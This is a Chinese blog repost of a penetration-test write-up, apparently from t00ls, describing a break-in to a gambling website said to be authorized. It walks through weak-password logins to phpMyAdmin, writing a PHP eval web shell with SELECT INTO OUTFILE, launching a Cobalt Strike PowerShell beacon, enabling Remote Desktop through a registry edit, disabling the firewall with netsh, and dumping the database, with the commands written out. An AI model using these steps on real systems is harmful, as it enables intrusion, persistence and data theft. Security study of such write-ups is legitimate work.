<返回更多

关于一次弱口令的BC渗透

2021-06-11  公众号  暗网视界
加入收藏

欢迎搜索公众号:白帽子左一

每天分享更多黑客技能,工具及体系化视频教程(免费领)

某种原因,接手了一个授权的bc站。


内心是拒绝的,但是没办法,硬着头皮收下了。


其实都知道,bc站不是很好弄,在大佬眼里,可能就是掏出一个0day就进去了
但像我这种dd,只敢远观。


打开主页,还算清新的画风,比那些打开就这闪那闪花里胡哨的站舒服多了。

关于一次弱口令的BC渗透

 


简单的扫了一下目录,扫出了两个比较有用的的东西就是一个后台,一个探针

关于一次弱口令的BC渗透

 


见到后台,废话不多说,直接弱口令套餐来一份


得到的结果肯定是 密码错误X1 密码错误X2 密码错误X3…………


算了,不浪费时间了,看一下探针~ 根据探针,得知网站的根目录。

 

底下有phpmyadmin的连接测试

关于一次弱口令的BC渗透

 


直接弱口令再来一套,root root 密码错误

Root 123456 密码错 唉 不对 好像是连接成功了

关于一次弱口令的BC渗透

 


激动的留下了眼泪
根据探针,得知phpmyadmin的后台地址

关于一次弱口令的BC渗透

 


Root 123456
登录

关于一次弱口令的BC渗透

 


Phpmyadmin进来了,网站根目录也知道了,那还唠啥了,直接拿shell了


直接执行sql语句

 

select'<?php @eval($_POST[pass]);?>' into outfile 'D:/xxx/xxx/xxx.php'


 

关于一次弱口令的BC渗透

 


一句话连接上,


Whoami system ………… 没意思啊,提权都不用了

关于一次弱口令的BC渗透

 


通过查看服务器文件,得知后台登陆密码,登陆后台

关于一次弱口令的BC渗透

 


因为个人喜好,比较喜欢用cs,powshell上线


读了一下密码,直接远程连接

关于一次弱口令的BC渗透

 


但是

关于一次弱口令的BC渗透

 


netstat -an ,没开3389

关于一次弱口令的BC渗透

 


开启3389

 

REG ADD HKLMSYSTEMCurrentControlSetControlTerminal" "Server /v fDenyTSConnections /t REG_Dword /d 00000000 /f


但是连接了一下,还是不行,用nmap扫描了一下端口,只有80端口开放
应该是开着防火墙


netsh firewall set opmode mode=disable 关闭防火墙

关于一次弱口令的BC渗透

 


再连接3389 连接成功

关于一次弱口令的BC渗透

 


根据浏览器历史记录,又发现另一个网站后台

关于一次弱口令的BC渗透

 


到现在其实没啥了,直接数据库打包~完活上交。

作者:T00ls-Azjj98

转自:
https://www.t00ls.net/articles-56653.html

声明:本站部分内容来自互联网,如有版权侵犯或其他问题请与我们联系,我们将立即删除或处理。
▍相关推荐
更多资讯 >>>